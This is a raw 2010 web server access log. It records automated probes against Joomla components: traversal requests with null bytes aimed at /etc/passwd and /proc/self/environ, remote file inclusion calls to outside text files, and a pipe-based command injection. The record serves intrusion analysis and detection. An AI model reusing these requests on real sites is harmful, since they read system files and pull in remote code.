94.247.176.194 - - [26/Jul/2010:21:21:30 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:23:07 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.23.8.200 - - [26/Jul/2010:21:23:44 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:21:23:45 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:21:23:45 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
81.93.240.46 - - [26/Jul/2010:21:23:47 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
81.93.240.46 - - [26/Jul/2010:21:23:47 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
81.93.240.46 - - [26/Jul/2010:21:23:48 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:23:48 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:23:48 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:23:48 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
112.104.57.22 - - [26/Jul/2010:21:24:08 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:24:08 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:24:09 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:26:30 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:26:30 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:26:31 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.165.195.143 - - [26/Jul/2010:21:31:18 +0200] "GET /logs/access_log HTTP/1.0" 200 229879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
119.192.145.144 - - [26/Jul/2010:21:33:12 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:33:12 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:33:13 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:35:15 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
211.202.2.34 - - [26/Jul/2010:21:39:38 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:21:39:38 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
119.192.145.144 - - [26/Jul/2010:21:40:58 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.165.217.175 - - [26/Jul/2010:21:46:25 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:46:25 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:46:25 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
119.192.145.144 - - [26/Jul/2010:21:47:54 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:51:07 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:21:51:56 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:51:57 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:51:57 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:52:22 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:52:22 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:52:22 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
119.192.145.144 - - [26/Jul/2010:21:58:16 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:58:16 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:58:20 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:59:41 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:59:41 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:59:42 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.122.49.95 - - [26/Jul/2010:22:03:53 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
222.122.49.95 - - [26/Jul/2010:22:05:14 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
91.196.169.109 - - [26/Jul/2010:22:09:20 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.196.169.109 - - [26/Jul/2010:22:09:38 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.122.49.95 - - [26/Jul/2010:22:13:13 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
222.122.49.95 - - [26/Jul/2010:22:13:14 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
222.122.49.95 - - [26/Jul/2010:22:13:15 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
91.196.169.109 - - [26/Jul/2010:22:14:33 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
91.196.169.109 - - [26/Jul/2010:22:14:33 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.196.169.109 - - [26/Jul/2010:22:14:34 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:14:56 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:14:56 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:14:57 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
91.196.169.109 - - [26/Jul/2010:22:15:08 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
91.196.169.109 - - [26/Jul/2010:22:15:08 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.196.169.109 - - [26/Jul/2010:22:15:08 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:24:56 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:24:57 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
38.108.124.28 - - [26/Jul/2010:22:25:17 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:25:24 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:25:24 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:25:26 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:26:16 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:26:21 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:13 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:13 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:13 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:31 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:31 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:29:32 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
38.108.124.28 - - [26/Jul/2010:22:34:31 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:22:34:31 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:22:34:31 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:34:55 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:34:55 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:34:55 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:34:55 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:34:55 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:34:56 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
119.192.145.144 - - [26/Jul/2010:22:36:03 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:36:03 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:36:04 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
204.15.125.1 - - [26/Jul/2010:22:36:44 +0200] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
62.149.171.147 - - [26/Jul/2010:22:38:08 +0200] "GET //index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
208.38.36.33 - - [26/Jul/2010:22:38:31 +0200] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.813"
62.149.171.147 - - [26/Jul/2010:22:42:34 +0200] "GET //index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:44:30 +0200] "GET /logs/access_log//index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:44:32 +0200] "GET //index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:44:34 +0200] "GET /logs//index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:46:40 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
67.195.112.178 - - [26/Jul/2010:22:46:57 +0200] "GET /logs/?C=N;O=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.171.147 - - [26/Jul/2010:22:49:33 +0200] "GET /logs/access_log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:35 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:37 +0200] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:54 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:55 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:50:00 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:54:57 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:55:41 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:55:43 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:58:30 +0200] "GET /logs/access_log//index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:58:32 +0200] "GET //index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:58:33 +0200] "GET /logs//index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:23:01:54 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:01:54 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:23:03:57 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:04:10 +0200] "GET /logs/access_log//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:04:11 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
